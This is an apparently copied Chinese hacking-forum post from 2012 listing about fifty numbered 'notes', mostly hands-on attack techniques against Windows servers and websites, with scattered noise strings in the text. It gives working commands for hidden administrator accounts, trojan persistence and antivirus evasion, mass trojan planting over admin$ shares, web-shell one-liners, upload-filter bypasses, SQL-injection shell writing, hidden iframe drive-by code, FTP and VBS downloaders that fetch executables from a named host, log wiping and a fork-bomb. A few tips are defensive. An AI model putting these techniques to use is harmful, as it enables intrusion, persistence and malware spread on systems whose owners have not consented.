找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2536|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
2 N$ d. t; W; [- h1 s4 ~( }' j) ?cacls C:\windows\system32 /G hqw20:R& D5 p& O: E& t8 m/ O' e, g
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
8 w) Y6 x( h$ s  W# W+ ]恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F. A% {; ]+ \$ W) w# h6 q/ I
% e$ C6 {; I  t6 d4 \
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% U& R& \  t9 Q* r/ n: T2 M) N( [. t
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。7 g1 z- ^$ K% s5 w
# Y" L2 X6 {) K: \, T1 t" F" ]
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
* b* O+ Q, S- B6 }
; R# Z9 n1 B5 N3 J/ |* n3 p5、利用INF文件来修改注册表8 G" l2 Q( a1 d0 c' k8 ?" }4 x, A9 F
[Version]" e2 P7 A5 Y2 P6 @; T; O
Signature="$CHICAGO$") e5 B% k0 [. H4 v
[Defaultinstall]5 c7 u& b4 M' @0 B
addREG=Ating" [' i! O* K; n( p. e# I. m& \0 x
[Ating]( ?! E; h# O8 |5 C$ U
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) k; e& C6 W3 y1 i1 g以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:& j! }3 C8 _5 t+ O4 ]' w9 H2 F" e* ?
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径5 F$ U* f8 R; [! r  Y  p7 L; {
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU) W" {6 {$ N! g$ I+ S
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU0 L! m6 |2 h$ e2 ]( n2 f' A' n9 E& y
HKEY_CURRENT_CONFIG 简写为 HKCC
/ Y, D1 R7 W* j4 {/ y6 S0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. X3 L' i3 W7 k5 |8 Y2 Z
"1"这里代表是写入或删除注册表键值中的具体数据
! W9 l2 L# q7 {/ k2 g) R4 v7 Y8 D5 r. b8 z# ?& N
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,' M3 r& C9 T/ B7 ?; n
多了一步就是在防火墙里添加个端口,然后导出其键值. x' a% V; t7 g4 A
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]7 Y5 _. s* A! T0 n8 [: N

6 H; g( m. V6 o9 `7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
+ L; V' Q5 K- z- A8 c& g在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。* i( g6 W: N5 N' o1 Z

$ M, g% z& ]; T: ~8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。7 o/ Q" t' V/ r2 t- I# z# V4 q
6 [' Q9 C- p7 L5 Z# v) S, z
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
  [$ w( W/ M& l2 J. x) A可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。1 q$ L7 S! |! a9 w$ T& Z
% f0 U% E- ^6 q" E4 f
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”+ Z) T5 c% |& J# ^2 p

2 G+ q6 j) k- ?11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,; s. h/ q: H" ^6 ?9 f/ m
用法:xsniff –pass –hide –log pass.txt
" s7 d6 o, t/ d# ^( U. N; }1 P
; m8 G0 n; f7 m0 _" X% q! n. o12、google搜索的艺术
8 E" v4 A+ n& ~* H# m6 ?( C- A搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”; K4 I& a3 V7 ?& W
或“字符串的语法错误”可以找到很多sql注入漏洞。# P0 F: U+ ~: a$ E
4 J5 Y% P9 }# @% W" N4 }, D
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。6 v) P0 K5 V% T+ h2 |
0 c: d; w: [$ t0 s$ k& V* u6 B" D
14、cmd中输入 nc –vv –l –p 1987
% m, j) R; y* U  j/ J: a5 ?( z! V* N做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
( t0 l! q7 c& J7 F! Y: M( ^$ O
" s% B0 p7 j1 i5 f9 {$ A15、制作T++木马,先写个ating.hta文件,内容为
) G; e, X& P8 E" ~8 H" o2 O<script language="VBScript">' F% L2 o/ g& J8 D' k) l! h
set wshshell=createobject ("wscript.shell" )
9 y, F3 E) s2 \$ \, D( r+ Ha=wshshell.run("你马的名称",1)
! U" X# u. G4 `! Y9 i5 |window.close
0 l+ Y4 ?8 R/ Q4 L2 M</script>
; F/ i4 h8 \* v( u再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。+ g  R; `6 j/ T. w
; B9 B, L4 h! X; c4 U
16、搜索栏里输入7 M) z" n& K! N0 `0 _
关键字%'and 1=1 and '%'='
4 B6 G8 {/ t2 G, Y- a关键字%'and 1=2 and '%'=', c  a) K& g$ ?2 f5 U) U# l
比较不同处 可以作为注入的特征字符
7 V% g# F0 G- {: _& I7 d3 w5 b
1 J2 N- M+ p, X9 o17、挂马代码<html>) P6 S# J! A* \. u
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
. J3 z4 \* y& d& k; O% s</html>; l8 b$ j, }4 F( }
/ H3 M. z9 H7 q5 ]6 G' [# B
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,: P9 O. Z0 [' d* j( c
net localgroup administrators还是可以看出Guest是管理员来。; A& E4 K! c6 O# y4 Y; K

4 h+ O8 V0 y$ B7 z19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
9 R% ?; ~+ c9 f3 A$ |用法: 安装: instsrv.exe 服务名称 路径$ E3 o% P8 g7 t% q' c# n2 S' O
卸载: instsrv.exe 服务名称 REMOVE
/ a9 Y" N% B3 f, |
8 H; V- n) a1 |' e2 T; ?" c( a4 a& j/ z% f: v; S/ F
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉# X! S( z, q. {; O
不能注入时要第一时间想到%5c暴库。
( n( X' C+ l9 |7 e3 s& _# X2 _- Y0 U" H& c
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 r) f, \. `; V; |; v5 E5 g7 o; F! l# s' W, D
23、缺少xp_cmdshell时- C2 O! X2 V% k" t
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'/ i6 G7 C8 k$ ?  p  m' K( |. E3 z
假如恢复不成功,可以尝试直接加用户(针对开3389的); a% j' z2 Z. s& B  L
declare @o int
9 x* Q  M8 x6 q( @exec sp_oacreate 'wscript.shell',@o out9 C" m' u2 Z5 i) g! [4 `3 X
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员% T2 L. w: k! L+ p+ ]) X
% j- p/ W% t, l/ x) I, H
24.批量种植木马.bat
* t; p, c0 N  a. Y1 z" [. k  Tfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中( M5 f" j* P; Y; d1 [) W! V8 I3 B" P* O
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' H: e, \6 S0 L- d& ], q' z( u9 m扫描地址.txt里每个主机名一行 用\\开头
4 l. ^( P/ n2 i  r3 L1 x) ^$ t9 i# l6 _+ W
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。' }, f, c0 {' p( w; a4 U3 ]. V2 k5 h

+ b/ Q- F5 k; a' X7 V' q2 {26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ i, k0 b, t" `* }) H, i, y将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.( V9 |9 R& C$ L$ w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马2 M/ r( p4 m% b, A, a( L9 f
! v& O% n  U! z' X" H  K7 [
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
8 V4 R  Z5 u: l: S7 X然后用#clear logg和#clear line vty *删除日志- o! g3 N8 I5 X6 F8 w

! M2 e( [! q- j7 P5 n! P7 x* m28、电脑坏了省去重新安装系统的方法, y7 @; Z7 D2 D1 d
纯dos下执行,0 t2 b' f( E# I: [
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
/ [6 G( e. q& g, u( j2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config$ i9 b; ~% T, W! t2 \
3 y1 P8 x6 b- i& N/ h4 R
29、解决TCP/IP筛选 在注册表里有三处,分别是:
. w- u0 `/ M# A1 ~( M# n6 q: ?; O1 tHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip4 y6 ~2 V, d9 h7 Q
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip; u3 A  U1 y( n' N- @* O- ]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 v4 y" x( _/ W* N' k6 x分别用
' \! h6 \. j) q: \8 r9 Wregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, t/ U; d8 O5 h; N: Bregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ ?/ g! g6 b7 |/ ^# l" j1 g/ mregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# A% L0 b+ q# n' G+ {- j" S8 _+ h4 W命令来导出注册表项
% {" v6 z0 g1 E0 M% _然后把三个文件里的EnableSecurityFilters"=dword:00000001,7 ]/ N5 i0 U$ F6 v
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用  c& U# |& |7 ^, J( E
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。* q0 n7 N% f* E, C2 K0 p
9 u+ \; L" a2 l
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
9 D; S, c6 D8 s1 D+ n5 WSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
  Y; m  f* P& A1 G( ~0 D- g9 `7 S  Y7 ], O4 H7 C, Y& g& E
31、全手工打造开3389工具
( J* l: N" I3 R. W打开记事本,编辑内容如下:
+ [% Z  v1 x) h0 Q& R" J9 c5 d/ Techo [Components] > c:\sql
( S' L: |2 }% P2 I' Iecho TSEnable = on >> c:\sql
) }/ Q2 W7 U) C$ K( |# |sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q/ {" c8 x* {3 L# V* J1 @! }" W( y
编辑好后存为BAT文件,上传至肉鸡,执行9 q+ f! ]4 e* r- }! k

2 H$ Z5 d& \+ L( S  k32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马; v# r) a* E0 g% q& E# o4 k

. G9 g6 a. y- l4 T' W! W2 l5 I: ]33、让服务器重启; n" `9 i* z8 ?0 A% |  f
写个bat死循环:2 g2 C" k8 @/ h5 }7 |$ F- w$ w: i
@echo off
9 B; T* C. Y4 D) w/ i3 T  c:loop17 [* {% T4 ~( U! `+ P
cls# c* S+ q; c& ]) h/ F; d6 T
start cmd.exe7 E/ `. u. E6 C9 L$ T* F
goto loop1
$ L8 q* ~& b) G2 j保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
" w7 V5 H( Q9 u& j; }  `; O) ]% |$ ^* @1 P3 B! L. S; ^, P
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,* a1 `* r. p& O; [2 k5 A9 I; u
@echo off4 D+ x) `' K4 C0 s
date /t >c:/3389.txt9 d! f3 n3 ?) L: v! S: ?% p+ F7 [* M
time /t >>c:/3389.txt
& {% u6 z* w- {6 O' h+ b8 yattrib +s +h c:/3389.bat# f2 q" D! Z& `, s
attrib +s +h c:/3389.txt8 _9 y3 j, q/ b$ X9 u6 _
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
) K( V9 X- Y7 X& m3 L并保存为3389.bat9 Y: N9 A% \6 o; B/ Z8 {
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号9 j: E6 N( u3 s: A4 c
0 x* u" R( j& E4 h& m
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
5 c6 m' G- @1 {: e5 k- w5 E6 ^start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)2 ?4 W7 M% {7 e$ p1 i
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。+ w+ C; s( z' ^3 E4 r0 T
0 L; [' |! {9 A0 m! {# L7 P
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
: H  x7 S  p9 ~4 _3 eecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( r2 ^5 j# Z& z+ z) W5 I, uecho 你的FTP账号 >>c:\1.bat //输入账号+ b# x0 q; `5 h$ P5 S1 t9 j
echo 你的FTP密码 >>c:\1.bat //输入密码
8 b$ N! [. k+ N( Q, ?# n9 iecho bin >>c:\1.bat //登入
2 f' c+ p/ Z5 u9 qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么0 M" \( [* \! N" E; d) C5 H
echo bye >>c:\1.bat //退出
2 ?: u5 R7 k6 [" n5 L3 z然后执行ftp -s:c:\1.bat即可* Q, p! a- G; K) f

- R) \. D. r3 Q- V% ^- |' ~37、修改注册表开3389两法
! B& T* P5 V+ g3 P# m(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
  q' o( G6 s5 }3 o) W. fecho Windows Registry Editor Version 5.00 >>3389.reg
/ {9 R2 h9 P3 F" R1 {6 j# ^4 Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
7 V. ]1 ?- t4 R, S& U( D* }' xecho "Enabled"="0" >>3389.reg* q" `0 L8 L0 w' a* h" c! b+ a+ P
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
5 e4 S3 w0 P3 B, B2 i/ g8 [+ fNT\CurrentVersion\Winlogon] >>3389.reg) ~' d4 P, i! q% ~+ _. m. u
echo "ShutdownWithoutLogon"="0" >>3389.reg! u2 d0 P1 W3 C  r2 H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
; E3 _2 Z4 M7 S7 j& }+ I  e9 l3 G>>3389.reg
; Q8 h7 f1 Q& P* becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
0 k7 P8 d: H, g+ G% Y0 g: [4 K3 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
. B- m  n* {. L& F  z; B3 J  J>>3389.reg0 V# \. h0 D/ k/ I7 H4 u
echo "TSEnabled"=dword:00000001 >>3389.reg' q% F3 ~/ M; p- m4 ~! a# }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' Y7 b8 p+ r6 e; v5 A+ I
echo "Start"=dword:00000002 >>3389.reg
" `7 L. f1 K  K5 p, o3 h/ K5 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
+ |9 q2 \5 I/ ]% j4 o/ F- P>>3389.reg& M8 [+ j' a0 B: M: I8 }! c
echo "Start"=dword:00000002 >>3389.reg! z9 m) c* ]" `$ U
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
' v# u$ O5 f& w! j/ b5 e" decho "Hotkey"="1" >>3389.reg
5 P& O/ ?$ s# u+ h$ H, {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- w. C7 Z- V7 `
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
8 ~4 \$ G8 i/ \" B8 d* Z: Y( Iecho "PortNumber"=dword:00000D3D >>3389.reg$ W" y1 Z+ |/ Y) E8 w  R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; V5 D) M: x% u+ e! a2 D% E% Q9 }' c
Server\WinStations\RDP-Tcp] >>3389.reg
; R/ g8 H. M8 b( H+ z: j: D9 Uecho "PortNumber"=dword:00000D3D >>3389.reg
' |8 X( F; e8 A7 ]把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
8 J) i$ M7 U1 s  M. [: l(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
1 t# A" b. ?( L6 Z因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效3 G! K2 p0 [4 I% v
(2)winxp和win2003终端开启
: C, }( }& }- |7 d" h用以下ECHO代码写一个REG文件:; {' x- e* r$ E; S5 h2 g" r1 b0 w
echo Windows Registry Editor Version 5.00>>3389.reg
6 R# Q8 }( Q, E, Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! H6 k& R2 e4 x, {Server]>>3389.reg
. O2 o/ Q8 R% u9 W5 Recho "fDenyTSConnections"=dword:00000000>>3389.reg8 y+ J0 B) R5 p& L
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ B1 |" I1 ~$ k1 e8 F/ l' j* s( k& DServer\Wds\rdpwd\Tds\tcp]>>3389.reg7 n5 W& H( u( G' U7 Z7 T4 v7 T
echo "PortNumber"=dword:00000d3d>>3389.reg
& q7 T3 z; F3 K' Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* ?: n1 n" }! s* W! L5 eServer\WinStations\RDP-Tcp]>>3389.reg. E9 @( N! h/ S4 i5 }$ n% ?% ~
echo "PortNumber"=dword:00000d3d>>3389.reg0 ~* z: M$ w9 V9 Z: t# }( T+ `
然后regedit /s 3389.reg del 3389.reg
+ G1 F  l# e" b8 _XP下不论开终端还是改终端端口都不需重启
& ^' ?4 L& V9 _8 r# Q8 G0 N( S/ ], m8 D: k% c7 s* T, p
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( N; r6 ?2 h$ q9 M用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'6 n8 f# q# v+ ^* P. M1 |

( a3 Y6 m0 V5 g6 [8 i39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
% |, J$ e, v& t% Z; @(1)数据库文件名应复杂并要有特殊字符3 ?) e7 I6 g/ q) f& G+ ]+ K
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
* E5 e8 `( {1 p; Y* H将conn.asp文档中的& M& |( n9 Y, ]4 p7 E: H
DBPath = Server.MapPath("数据库.mdb")
2 m/ M2 S+ L  |+ N7 g  @+ sconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
: R$ J$ F# [% W# v/ W9 q* }! o. Q  }' d3 N, r' _
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置& w% J+ N( R- D' Q/ w
(3)不放在WEB目录里; y! g$ q" x/ h! d

/ D% ?# U4 X0 P& [. H' S0 V# ^0 l+ f40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉! ~: V5 ^+ ]; U& @: L
可以写两个bat文件
' ~/ K) j0 J/ H% G4 |6 H@echo off5 e' M. [6 j3 t' _% L; Z) L
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
7 d# _2 S7 Z; W( ]@del c:\winnt\system32\query.exe
6 d+ Y) I$ Q2 J3 K- |@del %SYSTEMROOT%\system32\dllcache\query.exe
7 }( G: q4 b% V7 C@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) ~: F: S: N# S/ A* P+ }

9 a* G$ t" K. k. ]' ?  p1 Q@echo off5 L9 S. Z, l2 U; r, q$ r+ i
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
/ G3 c1 C+ q) j4 d8 b/ ~@del c:\winnt\system32\tsadmin.exe$ `6 q2 K; V* Z( C3 u
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex( n, W) Q2 b9 U, c" `! t& \' M
. p, {6 @- c# {  S" r/ U: p
41、映射对方盘符
* g) K/ p' E! ~: d- \telnet到他的机器上,% ?5 w8 n8 J! P+ x0 e+ n+ \
net share 查看有没有默认共享 如果没有,那么就接着运行
- Z% p* \% x5 r. {4 U6 z' Unet share c$=c:
( I1 \0 ^% s( {9 V4 y! @: e4 t2 V% \net share现在有c$* |" i, B1 d; s
在自己的机器上运行: \9 p* ?& @0 |
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
8 t; N7 t5 }  Z+ i1 p$ ^5 v0 x
* Y& r2 i  _! G( n42、一些很有用的老知识1 f. J% {% [  \: @
type c:\boot.ini ( 查看系统版本 )
( n' o3 {9 J9 u1 l! r* ^net start (查看已经启动的服务)
& J5 i1 F* o8 m( [/ {query user ( 查看当前终端连接 )
' h# R- S: x8 ^3 j) hnet user ( 查看当前用户 )
1 ~( z) Z- B* S8 Gnet user 用户 密码/add ( 建立账号 )
1 y' S6 k6 \$ s( i# \net localgroup administrators 用户 /add (提升某用户为管理员)1 v8 R2 z8 x9 K0 S
ipconfig -all ( 查看IP什么的 )( ~8 r/ k8 ^; W0 G# Q* N8 F
netstat -an ( 查看当前网络状态 )
+ N7 Y- i$ w; p: v' m, Lfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)8 F6 E3 P5 E+ H) J$ K/ ~# e: P
克隆时Administrator对应1F47 p# R; [7 B" v- E9 A  m/ K
guest对应1F5
! D4 j& Q4 r9 W) Q  a, K9 k+ o; `tsinternetuser对应3E87 W3 k0 c  G% _, H; m

6 ?- ]) n  |; E3 R43、如果对方没开3389,但是装了Remote Administrator Service
* ^: D, ]: `' A# C用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接1 g# N( H; |7 g9 N' z; r* f
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息; p8 {: \; B9 [  ?, m
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
9 h# \& O3 j, x' j7 S2 |- ~$ _' a
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)' P9 m; A6 i, p7 b; Q9 x
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)9 s( E; |6 g' V9 ^& N+ ], O
$ T  M: J* d# D2 o7 k2 z+ _& f, b
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
+ x6 Q9 Y$ ~. O3 G# `echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
: O( q2 F" H0 ]0 N' f2 A^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
* Q( Q( b) `9 q6 RCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =; D- H! Y1 {9 x3 F, y% b
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs  v) J8 ]% T- g* z$ W* x5 k  W
(这是完整的一句话,其中没有换行符)9 R1 |- V: }5 G# R: t* k
然后下载:
, v2 e: l( A) U. w% q% Dcscript down.vbs http://www.hack520.org/hack.exe hack.exe$ `: a+ f1 j% s5 }+ Q
+ A- O2 }7 Y+ Q" {/ @7 L) f
46、一句话木马成功依赖于两个条件:
9 [4 ~' j  X$ b6 }1、服务端没有禁止adodb.Stream或FSO组件8 n  ]+ V/ D8 ?0 J- j5 d. V) m7 W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。/ D! P/ A% T7 u- {0 j# o
) v: t& r9 s/ M6 J( S
47、利用DB_OWNER权限进行手工备份一句话木马的代码:3 J( e$ I% R1 S4 _* z
;alter database utsz set RECOVERY FULL--" o6 H' I/ b4 ?5 f% d& ~( M
;create table cmd (a image)--
5 r; b. b" t  |: f. }5 R+ E3 ^;backup log utsz to disk = 'D:\cmd' with init--9 P' O9 q. `/ j4 B
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--- Z3 B4 @" X6 f+ g8 H
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
" {8 D- ?5 M: c7 }2 s, k3 g5 I注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
  s, l0 P, Z( A# {5 O; Q" O: t+ i1 ^0 q7 X6 g; q. U
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
# H2 _. B3 e. S  B3 |. S& u* U9 V, _7 p: Y$ Y
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
4 ]; A* N/ ?' s  i" s$ H7 L( m$ `所有会话用 'all'。
( F2 x: d3 U& H$ `2 G4 v' D0 q-s sessionid 列出会话的信息。$ Q+ T. u4 c3 G" V$ G
-k sessionid 终止会话。* w% G" _5 B; {7 x0 y3 u
-m sessionid 发送消息到会话。
" \+ Q0 T9 N/ @( W/ S/ W* J) x- F1 J+ q8 @, j6 y+ @9 X
config 配置 telnet 服务器参数。
; g2 k, l1 H) |; n$ T" O3 q9 M8 n6 ~. P( W! d$ B6 Q6 c
common_options 为:0 _5 d* Q' w6 i$ }; o, H
-u user 指定要使用其凭据的用户$ P7 a( O& G" P4 E
-p password 用户密码+ V2 j9 K8 x! J, t% P

" v  \5 M" N/ C4 M: x7 Econfig_options 为:
& [( }  t; ^/ f" j1 a( G0 udom = domain 设定用户的默认域
8 q" T+ d4 i. f/ }ctrlakeymap = yes|no 设定 ALT 键的映射; L3 S8 K: L5 @! C
timeout = hh:mm:ss 设定空闲会话超时值
0 }* Z. g1 K+ ^, Q( `8 I4 Btimeoutactive = yes|no 启用空闲会话。
3 Y, O$ ^2 H; F5 D  Vmaxfail = attempts 设定断开前失败的登录企图数。
- A0 ?  b' H6 t$ X, f  k" ^+ pmaxconn = connections 设定最大连接数。
! d: y! B: k1 i0 ~- d0 Oport = number 设定 telnet 端口。9 }6 K3 p  z; p) q3 P* _
sec = [+/-]NTLM [+/-]passwd. P/ B' u$ ~/ L6 s* Z" H
设定身份验证机构" a7 R" K- Z# R- w6 j# e5 I8 a
fname = file 指定审计文件名。% P; F' K" s# `) p' j
fsize = size 指定审计文件的最大尺寸(MB)。
% X5 {* H5 `! I& ~mode = console|stream 指定操作模式。5 A* @/ c- D6 C2 o
auditlocation = eventlog|file|both
+ k% X' S; b, [/ K2 X/ l* x" i% l7 m指定记录地点
# o, k; u- X# S7 N' @& Oaudit = [+/-]user [+/-]fail [+/-]admin" V3 `7 {$ e/ r6 |6 F* Z

# H" J1 d( c* J0 J$ i: X& A49、例如:在IE上访问:# v- g9 k/ {2 ~  q$ c
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' s6 q7 ^5 s/ b  w7 P8 nhack.txt里面的代码是:- Q8 W0 M* `7 G: I
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
- D) K9 t% H- b* a9 `把这个hack.txt发到你空间就可以了!
4 [! r: W+ B7 V( b' T9 j这个可以利用来做网马哦!
$ g9 C: H$ p9 p) ^6 b7 Y" X2 |0 U6 B# Z: x. @2 E0 U8 o! A* D  M4 W
50、autorun的病毒可以通过手动限制!
+ k: k. J/ _) ~' p  z1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
( k; w) ^6 U/ }2,打开盘符用右键打开!切忌双击盘符~
